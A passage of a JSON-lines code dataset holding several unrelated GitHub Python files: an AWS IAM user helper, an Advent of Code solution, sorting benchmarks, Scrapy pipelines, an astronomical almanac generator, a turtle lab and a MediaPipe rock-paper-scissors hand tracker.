\\n'\\\r\n .format(style, p)\r\n html += ' \\n'\r\n \r\n with open('new_index.html', 'w') as page:\r\n page.write(html)\r\n\r\n return data # возвращаем данные (флюид интерфейс)","repo_name":"ElenaFat918/pythonapp","sub_path":"pythonapp/join_job/html_creater.py","file_name":"html_creater.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"86360874378","text":"import logging\nimport json\nfrom logging.config import fileConfig\nfrom botocore.exceptions import ClientError\n\nfileConfig('logging_config.ini')\nlogger = logging.getLogger()\ntags = [{'Key': 'IsWork','Value': 'true'},{'Key': 'WorkType','Value': 'customer360'}]\n\n\ndef iam_create_user(client, user, override=False):\n try:\n client.create_user(\n UserName=user['username'],\n Tags=tags)\n logger.info('User: {username} has been created'.format(username=user['username']))\n print(user['username'])\n #user_aws = client.get_user(UserName=user['username'])\n client.create_login_profile(\n Password=user['password'],\n PasswordResetRequired=False,\n UserName=user['username']\n )\n except ClientError as e:\n if e.response['Error']['Code'] == 'EntityAlreadyExists':\n if not (override):\n logger.info('User: {username} already exist and override flag is: {override}'.format(username=user['username'], override=override)) \n else:\n logger.info('User: {username} already exist but override flag is: {override}. User will be re-created. NOT IMPLEMENTED'.format(username=user['username'], override=override))\n else:\n logger.info('Unhandled error. Please check your code.')\n raise e\n client.add_user_to_group(\n GroupName=user['Group'],\n UserName=user['username']\n )\n\ndef iam_create_group(client, group):\n try:\n group = client.create_group(\n Path=\"/\",\n GroupName=group\n )\n except ClientError as e:\n if e.response['Error']['Code'] == 'EntityAlreadyExists':\n logger.info('Group: {g} already exist. Will skip the group creation step'.format(g=group)) \n else:\n logger.info('Unhandled error when creating group. Please check your code.')\n raise e\n ","repo_name":"alesabater/customer360","sub_path":"source/users/manager_user.py","file_name":"manager_user.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17580405894","text":"#!/usr/bin/python3\n# Advent of code 2020 day 14\n# See https://adventofcode.com/2020/day/14\nimport re\n\nwith open(\"input.txt\") as f:\n lines = f.readlines()\n\n\ndef load_mask(mask):\n mask_or = 0\n mask_and = pow(2, 36)-1\n for i, c in enumerate(reversed(mask)):\n bit = pow(2, i)\n if c == '0':\n mask_and -= bit\n elif c == '1':\n mask_or += bit\n return mask_or, mask_and\n\n\ndef part1():\n mask = load_mask('X' * 36)\n memory = {}\n for line in lines:\n match1 = re.fullmatch(r\"mask = (.*)\", line.strip())\n match2 = re.fullmatch(r\"mem\\[(\\d+)] = (\\d+)\", line.strip())\n if match1:\n mask = load_mask(match1.group(1))\n elif match2:\n addr, val = match2.groups()\n masked_val = (int(val) | mask[0]) & mask[1]\n memory[addr] = masked_val\n\n print(sum(memory.values()))\n\n\ndef list_values(value, mask):\n results = []\n result_count = pow(2, len([c for c in mask if c == 'X']))\n for i in range(0, result_count):\n x_bit = 0\n result = []\n for bit in range(0, len(value)):\n digit = '0'\n if mask[bit] == 'X':\n if i & pow(2, x_bit):\n digit = '1'\n x_bit += 1\n elif value[bit] == '1' or mask[bit] == '1':\n digit = '1'\n result.append(digit)\n results.append(\"\".join(result))\n\n return results\n\n\ndef part2():\n mask = 'X' * 36\n memory = {}\n for line in lines:\n match1 = re.fullmatch(r\"mask = (.*)\", line.strip())\n match2 = re.fullmatch(r\"mem\\[(\\d+)] = (\\d+)\", line.strip())\n if match1:\n mask = match1.group(1)\n elif match2:\n addr, val = match2.groups()\n binary_addr = format(int(addr), \"036b\")\n masked_addrs = list_values(binary_addr, mask)\n for masked_addr in masked_addrs:\n memory[masked_addr] = int(val)\n\n print(sum(memory.values()))\n\n\npart1()\npart2()\n","repo_name":"chrisglencross/advent-of-code","sub_path":"aoc2020/day14/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"39476989702","text":"import time\nimport random\n\nlenarr = [40, 400, 4000, 20000]\n\nfor i in range(4):\n\tn = lenarr[i]\n\trandom.seed(100)\n\tarray1 = random.sample(range(2*n + 1), n)\n\tarray2 = random.sample(range(2*n + 1), n)\n\ttarget = n*1.5\n\n\tdef mergesort(arr, i, j):\n\t\tif i > j:\n\t\t\treturn\n\n\t\tif i == j:\n\t\t\treturn [arr[i]]\n\n\t\tmid = (i + j)//2\n\n\t\tx = mergesort(arr, i, mid)\n\t\ty = mergesort(arr, mid + 1, j)\n\n\t\ttemparr = merge(x, y)\n\n\t\treturn temparr\n\n\tdef merge(arr1, arr2):\n\t\ttemparr = []\n\t\tl1 = 0\n\t\tl2 = 0\n\n\t\twhile l1 < len(arr1) and l2 < len(arr2):\n\t\t\tif arr1[l1] <= arr2[l2]:\n\t\t\t\ttemparr.append(arr1[l1])\n\t\t\t\tl1 += 1\n\n\t\t\telse :\n\t\t\t\ttemparr.append(arr2[l2])\n\t\t\t\tl2 += 1\n\n\t\twhile l1 < len(arr1):\n\t\t\ttemparr.append(arr1[l1])\n\t\t\tl1 += 1\n\n\t\twhile l2 < len(arr2):\n\t\t\ttemparr.append(arr2[l2])\n\t\t\tl2 += 1\n\n\t\treturn temparr\n\n\tdef getactualindex(arr, startingidx, pointer):\n\t\tcount = 0\n\t\tfor i in range(startingidx + 1):\n\t\t\tif arr[i] <= arr[pointer]:\n\t\t\t\tcount += 1\n\n\t\t\telse :\n\t\t\t\tbreak\n\n\t\treturn count\n\n\tdef insertionsort(arr):\n\t\tstartingidx = 0\n\t\twhile startingidx < len(arr) - 1:\n\t\t\tpointer = startingidx + 1\n\t\t\tidx = getactualindex(arr, startingidx, pointer)\n\t\t\ttemp = pointer - 1\n\t\t\twhile temp >= idx :\n\t\t\t\tarr[temp], arr[temp + 1] = arr[temp + 1], arr[temp]\n\t\t\t\ttemp -= 1\n\n\t\t\tstartingidx += 1\n\n\t\treturn arr \n\n\tst_insertion = time.time()\n\tinsertionsort(array1)\n\tend_insertion = time.time()\n\tprint('Time taken by insertion sort :', end_insertion - st_insertion)\n\tst_merge = time.time()\n\tmergesort(array2, 0, len(array2) - 1)\n\tend_merge = time.time()\n\tprint('Time taken by merge sort :', end_merge - st_merge)\n\n\tdef binarysearch(arr, l, r, target):\n\t\twhile l <= r :\n\t\t\tmid = (l + r)//2\n\n\t\t\tif arr[mid] == target :\n\t\t\t\tprint(mid)\n\t\t\t\treturn \n\n\t\t\telif arr[mid] > target :\n\t\t\t\tr = mid - 1\n\n\t\t\telse :\n\t\t\t\tl = mid + 1\n\n\t\tprint(\"This element can not be found\")\n\t\t\n\n\tdef linersearch(arr, target):\n\t\tfor i in range(len(arr)):\n\t\t\tif arr[i] == target :\n\t\t\t\tprint(i)\n\t\t\t\treturn \n\n\t\tprint(\"This element can not be found\")\n\n\t\t\t\n\tst_linear = time.time()\n\tlinersearch(array1, target)\n\tend_linear = time.time()\n\tprint(\"Time taken by linear search :\", end_linear - st_linear)\n\n\tst_binary = time.time()\n\tbinarysearch(array2,0 , len(array2)-1, target)\n\tend_merge = time.time()\n\n\tprint(\"Time taken by the binary search\", end_merge - st_merge)\n\n\n","repo_name":"cynic-8122/DSA-in-Python","sub_path":"ADA Surprise test/mergesortandinsertionsort.py","file_name":"mergesortandinsertionsort.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71014423643","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\nfrom urllib.request import urlopen\nimport re\nimport os\nfrom .settings import PIC_DIRECTORY\n\nclass CleanInfoPipeline():\n def process_item(self, item, spider):\n if spider.name == 'itao_supply' and item['info']:\n for index, field in enumerate(item['info']):\n if '\\t' in field or '\\r' in field or '\\n' in field:\n item['info'][index] = re.sub('[\\t\\n\\r]','',field)\n item['info'][index] = re.sub('[\\t\\n\\r]', '', field)\n return item\n\n\nclass DownloadPicsPipeline():\n def process_item(self, item, spider):\n if spider.name == 'itao_supply':\n self.download_pic(item['pictures'], item['barcode2D'])\n return item\n\n def download_pic(self, urls, code):\n dir = PIC_DIRECTORY + code\n os.mkdir(dir)\n for index, url in enumerate(urls):\n print('正在下载图片: {}_{}'.format(code,index))\n pic_name = '{0}/pic_{1}.{2}'.format(dir, index, 'jpg')\n content = urlopen(url).read()\n with open(pic_name, 'wb') as f:\n f.write(content)\n\n\nclass MongoPipeline(object):\n\n def __init__(self, mongo_uri, mongo_db):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DB')\n )\n\n def open_spider(self, spider):\n self.client = pymongo.MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n\n def process_item(self, item, spider):\n name = item.__class__.__name__\n self.db[name].insert(dict(item))\n return item\n\n def close_spider(self, spider):\n self.client.close()\n","repo_name":"JayWu7/Economic-Forest-Information-Recommendation-System","sub_path":"crawls/crawls/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"36178651577","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport calendar\nfrom subprocess import run\nimport datetime\nimport dateutil.parser\nfrom math import ceil\nfrom pytz import timezone\n\nfrom lunardate import LunarDate\n\nfrom skyfield.api import load, Topos\nfrom skyfield.units import Angle\nfrom skyfield.earthlib import sidereal_time\n\nfrom _svgnode import *\nfrom _calendar import listDates\nfrom save_calculations import cached, CalculationResults, getCached\n\nfrom diagram_of_planets import DiagramOfPlanets\n\n\nobjects = load(\"de421.bsp\")\nsun = objects[\"Sun\"]\nearth = objects[\"Earth\"]\ntimescale = load.timescale()\n\n\nconvertSign = lambda i: \"\" if i >= 0 else \"-\"\n\ndef convertHM(ra):\n sign, h, m, _ = ra.signed_hms()\n return \"%s%dh\" % (convertSign(sign), h) +\\\n \"%02dm\" % m \n\ndef convertHMS(ra):\n sign, h, m, s = ra.signed_hms()\n return \"%s%dh\" % (convertSign(sign), h) +\\\n \"%02dm\" % m +\\\n \"%02ds\" % s\n\ndef convertDeg(deg):\n sign, d, m, _ = deg.signed_dms()\n return \"%s%d°%02d'\"\\\n % (convertSign(sign), d, m)\n\ndef convertSidereal(sr):\n sign, _, m, s = sr.signed_hms()\n return \"%s%dm\" % (convertSign(sign), m) +\\\n \"%02ds\" % s\n\n\n\n \n\n\n\ndef svgTable(\n table, headers,\n fontsize=10, lineheight=1.6, headerwidth=1.37\n):\n\n g = SVGNode(\"g\")\n\n headerWidth = [\n len(header) * fontsize * headerwidth \n for header in headers\n ]\n\n text = lambda x, y, l: SVGNode(\"text\", **{\n \"x\": x,\n \"y\": y,\n# \"textLength\": l,\n \"class\": \"common\",\n# \"lengthAdjust\": \"spacingAndGlyphs\"\n# \"text-anchor\": \"middle\",\n })\n\n x, y = 0, 0\n for i in range(0, len(headers)):\n n = text(x,y, headerWidth[i]).append(headers[i])\n n.attrs[\"class\"] += \" table-header\"\n g.append(n)\n x += headerWidth[i]\n y += fontsize * lineheight \n\n for row in table:\n x = 0\n for i in range(0, len(row)):\n n = text(x,y, headerWidth[i]).append(row[i])\n n.attrs[\"class\"] += \" table-cell\"\n if i == 0: n.attrs[\"class\"] += \" table-first-cell\"\n g.append(n)\n x += headerWidth[i]\n y += fontsize * lineheight\n\n return g\n \n\n\n\nclass MonthGenerator:\n\n DEFS = \"\"\"\n \n \n \n \"\"\"\n\n STYLE = \"\"\"\n .table-first-cell{\n text-align: right;\n }\n .red{ fill: red; }\n .sup{ font-size: 6pt; fill: red; }\n .common,.table-cell,.table-header{\n font-family: NotoMono, monospace;\n font-size: 7pt;\n fill: black;\n white-space: pre;\n z-index:1000;\n }\n .title{\n font-family: serif;\n font-weight: bold;\n font-size: 15pt;\n fill: black;\n z-index:1000;\n }\n .cheatsheet{\n font-size:30pt; font-family:sans; font-weight:bold;\n fill: white;\n }\n \"\"\"\n\n PAGE_SIZE = (1052, 744)\n ANCHOR_TOP_LEFT = (30, 30)\n ANCHOR_MIDDLE_LEFT = (30, 520)\n ANCHOR_BOTTOM_LEFT = (30, 630)\n\n\n def __stripSVG(self, svgtext):\n lines = svgtext.split(\"\\n\")\n found = False\n ret = []\n for line in lines:\n if not found and \"%s\" % self.STYLE)\n self.back.append(self.DEFS).append(\"\" % self.STYLE)\n self.decoratePage(self.front, withFigure=(tableECols <= 4))\n self.decoratePage(self.back, withFigure=False)\n\n # front page\n\n self.front.append(table1).append(tableE)\n\n x, y = self.ANCHOR_MIDDLE_LEFT \n for day in [1, 9, 17, 25, self.monthLastDay]:\n self._tableOfPlanets(day)\\\n .attr(\"transform\", \"translate(%d %d)\" % (x, y))\\\n .appendTo(self.front)\n x += 180\n\n # back page\n\n self.back.append(table2)\n\n SVGNode(\n \"g\",\n transform=\"translate(%d %d) scale(0.9 0.9)\" % (\n 415,\n self.ANCHOR_MIDDLE_LEFT[1] - 25 \n )\n ).append(\n self.__stripSVG(self.diagramOfPlanets.hourAngleDiagram())\n ).appendTo(self.back)\n\n SVGNode(\n \"g\",\n transform=\"translate(%d %d) scale(0.9 0.9)\" % (\n self.ANCHOR_MIDDLE_LEFT[0] - 10,\n self.ANCHOR_MIDDLE_LEFT[1] - 25\n )\n ).append(\n self.__stripSVG(self.diagramOfPlanets.decDiagram())\n ).appendTo(self.back)\n\n def _addCheatsheet(self, page):\n # write formula onto background in white\n def addtext(x, y, r, text):\n g = SVGNode(\"g\", transform=\"translate(%d %d) rotate(%d)\" % (x,y,r))\n SVGNode(\"text\", **{\n \"x\": \"0\", \"y\": \"0\",\n \"class\": \"cheatsheet\",\n \"text-anchor\": \"left\",\n }).append(text).appendTo(g)\n g.appendTo(page)\n\n addtext(100, 400, -60, \"时差=视太阳时-平太阳时\")\n addtext(120, 700, -70, \"当地恒星时=格林尼治恒星时+经度\")\n addtext(800, 200, 80, \"经度差1度=时间差4分钟\")\n\n\n def decoratePage(self, page, withFigure=True):\n SVGNode(\"rect\", \n x=0, y=0, width=\"100%\", height=\"100%\",\n fill=\"#DFDFDF\"\n ).appendTo(page)\n\n SVGNode(\"text\", **{\n \"x\": \"50%\",\n \"y\": \"55%\",\n \"style\": \"font-size:300pt; font-family:sans; font-weight:bold\",\n \"fill\": \"white\",\n \"text-anchor\": \"middle\",\n }).append( str(self.month) ).appendTo(page)\n\n SVGNode(\"text\", **{\n \"x\": \"50%\",\n \"y\": \"80%\",\n \"style\": \"font-size:150pt; font-family:sans; font-weight:bold\",\n \"fill\": \"white\",\n \"text-anchor\": \"middle\",\n }).append( str(self.year) ).appendTo(page)\n\n self._addCheatsheet(page)\n\n logo = SVGNode(\"g\", transform=\"translate(965 720)\").append(\n SVGNode(\"text\", **{\n \"x\": \"0\", \"y\": \"0\", \"class\": \"title\",\n \"text-anchor\": \"left\",\n \"transform\": \"rotate(-90)\"\n }).append( \"%04d年%02d月\" % (self.year, self.month) )\n ).append(\n SVGNode(\"text\", **{\n \"x\": \"0\", \"y\": \"20\", \"class\": \"title\",\n \"text-anchor\": \"left\",\n \"transform\": \"rotate(-90)\"\n }).append( \"天文普及月历\" )\n ).append(\n SVGNode(\"text\", **{\n \"x\": \"0\", \"y\": 40,\n \"text-anchor\": \"left\",\n \"transform\": \"rotate(-90)\",\n }).append(\"采用本初子午圈. 所有时刻为UTC.\")\n ).append(\n SVGNode(\"text\", **{\n \"x\": \"0\", \"y\": 55,\n \"text-anchor\": \"left\",\n \"transform\": \"rotate(-90)\",\n }).append(\"作者: NeoAtlantis\")\n )\n logo.appendTo(page)\n\n if withFigure:\n SVGNode(\"g\",\n transform=\"translate(%d %d) scale(0.4 0.4)\" % (\n 720, self.ANCHOR_BOTTOM_LEFT[1] - 15 \n )\n ).append(self.fig1).appendTo(page)\n\n\n\n def _tableOfPlanets(self, day):\n headers = [\"%02d日\" % day, \"视赤经\", \"视赤纬\", \"视黄经\"]\n items = [\n (\"Mercury\", \"水星\"),\n (\"Venus\", \"金星\"),\n (\"Mars\", \"火星\"),\n (\"Jupiter\", \"木星\"),\n (\"Saturn\", \"土星\"),\n (\"Uranus\", \"天王星\"),\n (\"Neptune\", \"海王星\"),\n ]\n data = []\n for planetName, planetTranslation in items:\n src = self.calculationResults[\"planets\"][planetName][self.month][day]\n data.append([\n planetTranslation,\n convertHM( Angle(hours=src[\"ra\"]) ),\n convertDeg( Angle(degrees=src[\"dec\"]) ),\n convertDeg( Angle(degrees=src[\"ecllon\"]) ),\n ])\n\n \n table = svgTable(\n data, headers,\n fontsize=7, lineheight=1.7, headerwidth=1.9\n )\n return table \n\n\n\n def _tableOfEvents(self, start, end):\n node = SVGNode(\"g\")\n data = []\n x = 0\n y = 0\n count = 0\n MAXROWS = 10 \n COLWIDTH = 180\n for each in self.calculationResults[\"events\"][self.month-1]:\n day = int(each[1])\n if not (start <= day <= end): continue\n count += 1\n n = SVGNode(\"text\", **{\n \"x\": x,\n \"y\": y,\n \"class\": \"common\"\n }).append(\"%02d日 %s %s\" % (\n day, each[2], each[3]\n ))\n node.append(n)\n y += 10\n if count % MAXROWS == 0:\n y = 0\n x += COLWIDTH\n return node, ceil(count / MAXROWS)\n\n\n def _tableOfMonth(self, start, end):\n data = []\n row1, row2 = self._rowSubcalendar(start, end)\n data.append([\"\"] + row1)\n data.append([\"\"] + row2)\n #data.append([\"农历\"] + list(self._rowLunarDate(start, end)))\n #data.append([\"月相\"] + list(self._rowMoonPhase(start, end)))\n \n data.append([\" \"])\n data.append([\"UTC=0h..儒略日\"] + list(self._rowJulian(start, end)))\n data.append([\"........恒星时\"] + list(self._rowSidereal(start, end)))\n for e in self._rowsSun(start,end): data.append(e)\n \n\n data.append([\" \"])\n for e in self._rowsRiseset(start, end): data.append(e)\n\n headers = [\" \" * 8]\n for i in range(start, end+1):\n dt = datetime.datetime(self.year, self.month, i)\n weekday = \"一二三四五六日\"[dt.weekday()]\n headers.append(\"%02d (%s)\" % (i, weekday))\n\n table = svgTable(data, headers, fontsize=7, lineheight=1.7)\n return table \n\n def _rowSubcalendar(self, start, end):\n solartermTable = {}\n solarterms = self.calculationResults[\"solarterms\"][\"solarterms-iso\"]\n UTC = timezone(\"UTC\") \n for solartermName in solarterms:\n stDatetime = dateutil.parser\\\n .parse(solarterms[solartermName]).astimezone(UTC)\n solartermTable[(stDatetime.month, stDatetime.day)] = (\n solartermName,\n stDatetime\n )\n moondata = self.calculationResults[\"moonphase\"][self.month]\n\n row1, row2 = [], []\n # row1: by default lunar dates\n for day in range(start, end+1):\n ld = LunarDate.fromSolarDate(self.year, self.month, day)\n ldMonth = \"正二三四五六七八九十冬腊\"[ld.month-1] + \"月\"\n if ld.isLeapMonth:\n ldMonth = \"闰\" + ldMonth\n if ld.day <= 10:\n ldDay = \"初\" + \"一二三四五六七八九十\"[ld.day-1]\n elif ld.day < 20:\n ldDay = \"十\" + \"一二三四五六七八九\"[ld.day-11]\n elif ld.day == 20:\n ldDay = \"二十\"\n elif ld.day < 30:\n ldDay = \"廿\" + \"一二三四五六七八九\"[ld.day-21]\n elif ld.day == 30:\n ldDay = \"三十\"\n row1.append( ldMonth + ldDay )\n # row2: by default solarterm or moon phase\n display = lambda x, y: x + y.rjust(7-len(x), \" \")\n for day in range(start, end+1):\n displaySolarterm = None\n if (self.month, day) in solartermTable:\n st = solartermTable[(self.month, day)]\n displaySolarterm = display(st[0], st[1].strftime(\"%H%M\"))\n displayMoonPhase = None\n if moondata[day][\"phase\"]:\n displayMoonPhase = moondata[day][\"phase\"].replace(\":\", \"\")\n displayMoonPhase = displayMoonPhase.split(\" \")\n displayMoonPhase.reverse()\n displayMoonPhase = display(*displayMoonPhase)\n if not displaySolarterm and not displayMoonPhase:\n row2.append(\" \")\n elif bool(displaySolarterm) ^ bool(displayMoonPhase):\n row2.append(displaySolarterm or displayMoonPhase)\n else:\n row2.append(displayMoonPhase)\n row1[len(row2) - 1] = displaySolarterm\n return row1, row2\n\n\n def _rowJulian(self, start, end):\n for day in range(start, end+1):\n utc0 = timescale.ut1(self.year, self.month, day, 0, 0, 0)\n yield \"%.1f\" % utc0.tt\n\n def _rowSidereal(self, start, end):\n for day in range(start, end+1):\n utc0 = timescale.ut1(self.year, self.month, day, 0, 0, 0)\n yield convertHMS(Angle(hours=sidereal_time(utc0)))\n\n def _rowsSun(self, start, end):\n retRA, retDEC = [\"....太阳 视赤经\"], [\"........视赤纬\"]\n retEcllon, retEq = [\"........视黄经\"], [\"........均时差\"]\n\n for day in range(start, end+1):\n tdb0 = timescale.tdb(self.year, self.month, day, 0, 0, 0)\n tt0 = timescale.tt(self.year, self.month, day, 0, 0, 0)\n utc0 = timescale.utc(self.year, self.month, day, 0, 0, 0)\n ut10 = timescale.ut1(self.year, self.month, day, 0, 0, 0)\n\n astrometric = earth.at(tdb0).observe(sun).apparent()\n ra, dec, distance = astrometric.radec(epoch='date')\n ecllat, ecllon, _ = astrometric.ecliptic_latlon(epoch='date')\n\n equation_of_time = sidereal_time(ut10) - ra.hours + 12\n if equation_of_time > 1: equation_of_time -= 24\n\n retRA.append( convertHM(ra) )\n retDEC.append( convertDeg(dec) )\n retEcllon.append( convertDeg(ecllon) )\n retEq.append( convertSidereal(Angle(hours=equation_of_time)) )\n \n return [retEq, retRA, retDEC, retEcllon]\n\n def _rowsRiseset(self, start, end):\n moondata = self.calculationResults[\"moonphase\"][self.month]\n sundata = self.calculationResults[\"sunriseset\"][-0.8333][self.month]\n ctwidata = self.calculationResults[\"sunriseset\"][-6][self.month]\n atwidata = self.calculationResults[\"sunriseset\"][-18][self.month]\n\n ret = []\n for lat in [20, 30, 35, 40, 45, 50]:\n retSun = [\"%02dN...日出日没\" % lat]\n retCTwi = [\"...民用晨昏蒙影\"]\n retATwi = [\"...天文晨昏蒙影\"]\n retMoon = [\"......月出月没\"]\n merge = lambda x, y: \\\n ((x or \"-无-\") + \"/\" + (y or \"-无-\")).replace(\":\", \"\")\n for day in range(start, end+1):\n retSun.append(merge(\n sundata[day][lat][\"rise\"],\n sundata[day][lat][\"set\"]\n ))\n retCTwi.append(merge(\n ctwidata[day][lat][\"rise\"],\n ctwidata[day][lat][\"set\"]\n ))\n retATwi.append(merge(\n atwidata[day][lat][\"rise\"],\n atwidata[day][lat][\"set\"]\n ))\n retMoon.append(merge(\n moondata[day][\"riseset\"][lat][\"rise\"],\n moondata[day][\"riseset\"][lat][\"set\"]\n ))\n ret.append(retSun)\n ret.append(retCTwi)\n ret.append(retATwi)\n ret.append(retMoon)\n ret.append([\"\"])\n return ret\n \n\n\n\n def save(self, path=\".\"):\n frontname = \"%d-%d-front\" % (self.year, self.month)\n backname = \"%d-%d-back\" % (self.year, self.month)\n open(\n os.path.join(path, frontname + \".svg\"), \"w+\"\n ).write(str(self.front))\n open(\n os.path.join(path, backname + \".svg\"), \"w+\"\n ).write(str(self.back))\n\n run([\n \"rsvg-convert\",\n \"-f\", \"pdf\",\n \"-o\", frontname + \".pdf\",\n frontname + \".svg\"\n ])\n \n run([\n \"rsvg-convert\",\n \"-f\", \"pdf\",\n \"-o\", backname + \".pdf\",\n backname + \".svg\"\n ])\n os.unlink(frontname + \".svg\")\n os.unlink(backname + \".svg\")\n\n return (frontname + \".pdf\", backname + \".pdf\")\n\n\n\n\n\n\nif __name__ == \"__main__\":\n YEAR = int(sys.argv[1])\n assert YEAR > 2000 and YEAR < 3000\n filenames = []\n for i in range(1, 13):\n print(\"Generating for %d month %d...\" % (YEAR, i))\n x = MonthGenerator(YEAR, i)\n a, b = x.save()\n filenames.append(a)\n filenames.append(b)\n #break\n\n run([\"pdfunite\"] + filenames + [\"%d.pdf\" % YEAR])\n for f in filenames:\n os.unlink(f)\n","repo_name":"neoatlantis/almanac","sub_path":"monthgen.py","file_name":"monthgen.py","file_ext":"py","file_size_in_byte":18762,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"18197384292","text":"# Author: SMR (AMDG) 3/18/22\nimport turtle\n\n# windows\nwindow = turtle.Screen()\n\n# turtle customization propts\nt = turtle.Turtle()\ncolor = window.textinput(\"Color\", \"Enter the turtle color: \")\nt.color(color)\nt.shapesize(window.numinput(\"Size\", \"Enter the turtles size: \"))\n\n# Square function\ndef draw_square():\n t.fillcolor(color)\n t.begin_fill()\n for x in range(4):\n t.right(90)\n t.forward(100)\n t.end_fill()\n\n\n# Clicks\nwindow.onclick(draw_square(), btn=1)\n\nwindow.mainloop()","repo_name":"fp-computer-programming/cycle-14-labs-p22srogers","sub_path":"lab_14-6.py","file_name":"lab_14-6.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7294475358","text":"import cv2\nimport mediapipe as mp\nfrom dotenv import dotenv_values\nimport json\nimport xgboost as xgb\nimport joblib\nfrom scipy.stats import mode\nimport numpy as np\nfrom shifumi.models.train import Train\nconfig = dotenv_values(\".env\")\n\n\nmatching_dict = {0: \"Rock\", 1: \"Paper\", 2: \"Scissor\"}\n\n\nclass handTracker():\n def __init__(self, mode=False, maxHands=2, detectionCon=0.5, modelComplexity=1, trackCon=0.5):\n self.mode = mode\n self.train = Train()\n self.maxHands = maxHands\n self.detectionCon = detectionCon\n self.modelComplex = modelComplexity\n self.trackCon = trackCon\n self.mpHands = mp.solutions.hands\n self.hands = self.mpHands.Hands(self.mode, self.maxHands, self.modelComplex,\n self.detectionCon, self.trackCon)\n self.mpDraw = mp.solutions.drawing_utils\n\n def handsFinder(self, image, draw=True):\n imageRGB = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n self.results = self.hands.process(imageRGB)\n\n if self.results.multi_hand_landmarks:\n for handLms in self.results.multi_hand_landmarks:\n\n if draw:\n self.mpDraw.draw_landmarks(\n image, handLms, self.mpHands.HAND_CONNECTIONS)\n return image\n\n def positionFinder(self, image, handNo=0, draw=True):\n lmlist = []\n if self.results.multi_hand_landmarks:\n Hand = self.results.multi_hand_landmarks[handNo]\n for id, lm in enumerate(Hand.landmark):\n h, w, c = image.shape\n cx, cy = int(lm.x*w), int(lm.y*h)\n lmlist.append(cx)\n lmlist.append(cy)\n if draw:\n cv2.circle(image, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\n\n return lmlist\n\n def get_center(self):\n cap = cv2.VideoCapture(0)\n w = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\n h = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n print(h, w)\n\n def get_transform_list(self, lmlist):\n points = self.train.group_points(lmlist)\n centroid = self.train.get_centeroidnp(points)\n new_coordinates = points - centroid\n new_coordinates = new_coordinates.flatten()\n return new_coordinates\n\n def gather_data(self, num_samples):\n global rock, paper, scissor\n cap = cv2.VideoCapture(0)\n tracker = handTracker()\n # trigger tells us when to start recording\n trigger = False\n counter = 0\n\n while True:\n success, image = cap.read()\n image = tracker.handsFinder(image)\n lmList = tracker.positionFinder(image)\n if not success:\n break\n if counter == num_samples:\n trigger = not trigger\n counter = 0\n\n if trigger:\n if len(lmList) == 42:\n # Append lm list to the list with the selected class_name\n eval(class_name).append({counter: lmList})\n\n # Increment the counter\n counter += 1\n\n # Text for the counter\n text = \"Collected Samples of {}: {}\".format(\n class_name, counter)\n else:\n text = \"Press 'r' to collect rock samples, 'p' for paper, 's' for scissor and 'n' for nothing\"\n\n # Show the counter on the imaege\n cv2.putText(image, text, (3, 350), cv2.FONT_HERSHEY_SIMPLEX,\n 0.45, (0, 0, 255), 1, cv2.LINE_AA)\n\n cv2.imshow(\"Video\", image)\n k = cv2.waitKey(1)\n if k == ord('r'):\n # Trigger the variable inorder to capture the samples\n trigger = not trigger\n class_name = 'rock'\n rock = []\n if k == ord('p'):\n trigger = not trigger\n class_name = 'paper'\n paper = []\n if k == ord('s'):\n trigger = not trigger\n class_name = 'scissor'\n scissor = []\n if k == ord('x'):\n classes = ['rock', 'paper', 'scissor']\n for class_ in classes:\n file_path = config[\"DATA_HAND\"]\n with open(file_path + f'{class_}.json', 'w') as file:\n json.dump(eval(class_), file)\n print(\"end\")\n\n # Exit if user presses 'q'\n if k == ord('q'):\n break\n\n\ndef main():\n cap = cv2.VideoCapture(0)\n tracker = handTracker()\n model_xgb = joblib.load(config[\"MODEL_PATH\"])\n scaler = joblib.load(config[\"SCALER_PATH\"])\n values = []\n while True:\n success, image = cap.read()\n image = tracker.handsFinder(image)\n lmList = np.array(tracker.positionFinder(image))\n\n if len(lmList) == 42:\n lmList = tracker.get_transform_list(lmList)\n test = scaler.transform(lmList.reshape(1, -1))\n new = model_xgb.predict(test)\n values.append(new)\n\n if len(values) > 10:\n print(matching_dict[int(mode(values, keepdims=False)[0][0])])\n values = []\n\n cv2.imshow(\"Video\", image)\n cv2.waitKey(1)\n\n\nif __name__ == \"__main__\":\n # cap = cv2.VideoCapture(0)\n # tracker = handTracker()\n # tracker.get_center()\n # tracker.gather_data(10000)\n main()\n print(\"end\")\n","repo_name":"thirteenfoil8/shifumi","sub_path":"src/shifumi/pipeline/hand.py","file_name":"hand.py","file_ext":"py","file_size_in_byte":5439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32638608833","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/4/11 23:13\n# @File : lda.py\n# 